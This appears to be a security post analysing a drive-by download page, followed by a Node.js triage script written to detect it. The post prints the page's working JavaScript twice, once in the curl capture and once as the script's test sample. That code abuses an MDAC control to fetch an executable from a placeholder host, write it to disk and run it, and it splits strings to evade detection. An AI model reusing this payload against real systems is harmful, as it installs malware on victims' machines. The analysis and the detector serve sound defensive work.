
another variation of drive-by downloaders

The exploit used is fairly old. Another point worth noting is that the CLSID used here belongs to a Microsoft database control.

[zero@day testing]$ curl http://EVIL_SITE/db/wm.htm
<script>
var url,path;
url="http://EVIL_SITE/mc/game/db.exe";
path="C:\\boot.exe";
try{
var ado=(document.createElement("object"));
var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ab="Adodb.";
var cd="Stream";
var g=1;
var as=ado.createobject(ab+cd,"");
var h=1;
xml.Open("GET",url,0);
xml.Send();
as.type=1;
var n=1;
as.open();
as.write(xml.responseBody);
as.savetofile(path,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute(path,"","","open",0);
}
catch(e){}
;</script>
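The capture above has a recognisable shape: an object bound to the CLSID of a Microsoft database control (that CLSID is the RDS.DataSpace control from MDAC), CreateObject() calls that reach Microsoft.XMLHTTP, ADODB.Stream and Shell.Application through it, a savetofile() to disk, a ShellExecute() of the dropped file, the "Adodb."+"Stream" string split to dodge simple pattern matching, and an empty catch block. The following Node.js triage script is an added example, not code from the original post: it extracts the script blocks from a fetched page, resolves the one-level string-splitting trick, and scores the page against those indicators. The indicator weights, the verdict thresholds and the `triage()`/`normalise()` names are my own choices; the embedded sample is the page's own script with the site name left as the EVIL_SITE placeholder.

```javascript
// Static triage of a fetched HTML page for the drive-by pattern shown above.
// Added example; not code from the original post. Weights and thresholds are
// arbitrary choices for illustration.

// CLSIDs to flag. The page's CLSID is the RDS.DataSpace (MDAC) control; extend
// the table with other controls that expose CreateObject() the same way.
const FLAGGED_CLSIDS = {
  "bd96c556-65a3-11d0-983a-00c04fc29e36": "RDS.DataSpace (MDAC)",
};

// Behavioural indicators, matched on the lower-cased, de-obfuscated script.
// Each entry: [regex, description, weight].
const INDICATORS = [
  [/createobject\s*\(\s*"microsoft\.xmlhttp"/, "XMLHTTP created via DataSpace", 2],
  [/createobject\s*\(\s*"adodb\.stream"/, "ADODB.Stream created via DataSpace", 3],
  [/createobject\s*\(\s*"shell\.application"/, "Shell.Application created", 3],
  [/\.savetofile\s*\(/, "downloaded body written to disk", 3],
  [/\.shellexecute\s*\(/, "dropped file executed", 4],
  [/\.responsebody/, "binary HTTP body read", 1],
  [/catch\s*\(\s*\w+\s*\)\s*\{\s*\}/, "errors silently swallowed", 1],
];

// Pull the text of every <script> block out of an HTML document.
function extractScripts(html) {
  const out = [];
  const re = /<script[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Resolve the one-level string-splitting trick ("Adodb." + "Stream"):
// collect `name = "literal";` assignments, then replace `a+b` where both
// sides are known literals with the joined literal. Returns the lower-cased
// normalised source plus the literal table (used to report URLs and paths).
function normalise(src) {
  const literals = {};
  const assign = /\b(\w+)\s*=\s*"([^"]*)"\s*;/g;
  let m;
  while ((m = assign.exec(src)) !== null) literals[m[1]] = m[2];
  const joined = src.replace(/\b(\w+)\s*\+\s*(\w+)\b/g, (whole, a, b) =>
    a in literals && b in literals ? `"${literals[a]}${literals[b]}"` : whole
  );
  return { normalised: joined.toLowerCase(), literals };
}

// Score a page and return a small report: score, verdict, matched findings,
// and any string literals that look like a download URL or a drop path.
function triage(html) {
  const findings = [];
  let score = 0;
  const lowerHtml = html.toLowerCase();
  // The CLSID may sit in markup or, as here, inside a setAttribute() call.
  for (const [clsid, name] of Object.entries(FLAGGED_CLSIDS)) {
    if (lowerHtml.includes(clsid)) { findings.push(`flagged CLSID ${clsid} (${name})`); score += 4; }
  }
  const literals = {};
  for (const script of extractScripts(html)) {
    const n = normalise(script);
    Object.assign(literals, n.literals);
    for (const [re, desc, weight] of INDICATORS) {
      if (re.test(n.normalised)) { findings.push(desc); score += weight; }
    }
  }
  const values = Object.values(literals);
  const urls = values.filter((v) => /^https?:\/\//i.test(v));
  const paths = values.filter((v) => /^[a-z]:\\/i.test(v));
  const verdict = score >= 8 ? "malicious" : score >= 4 ? "suspicious" : "clean";
  return { score, verdict, findings, urls, paths };
}

// Constructed input: the page's captured script, site name left as a placeholder.
const SAMPLE_HTML = String.raw`<script>
var url,path; url="http://EVIL_SITE/mc/game/db.exe"; path="C:\\boot.exe";
try{
var ado=(document.createElement("object")); var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP",""); var f=1;
var ab="Adodb."; var cd="Stream"; var g=1;
var as=ado.createobject(ab+cd,""); var h=1;
xml.Open("GET",url,0); xml.Send(); as.type=1; var n=1;
as.open(); as.write(xml.responseBody); as.savetofile(path,2); as.close();
var shell=ado.createobject("Shell.Application",""); shell.ShellExecute(path,"","","open",0);
} catch(e){}
;</script>`;

console.log(JSON.stringify(triage(SAMPLE_HTML), null, 2));
```

Run it with `node triage.js` (file name hypothetical) against a page saved with `curl -o`; the report lists the flagged CLSID, each behaviour that matched, and the recovered download URL and drop path, which are the values worth adding to blocklists and host-based IOC checks. The string-joining step is deliberately minimal: it resolves one level of `a+b` between known literals, which is enough for this sample, and anything it cannot resolve is left in place so the raw indicators still get a chance to match.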
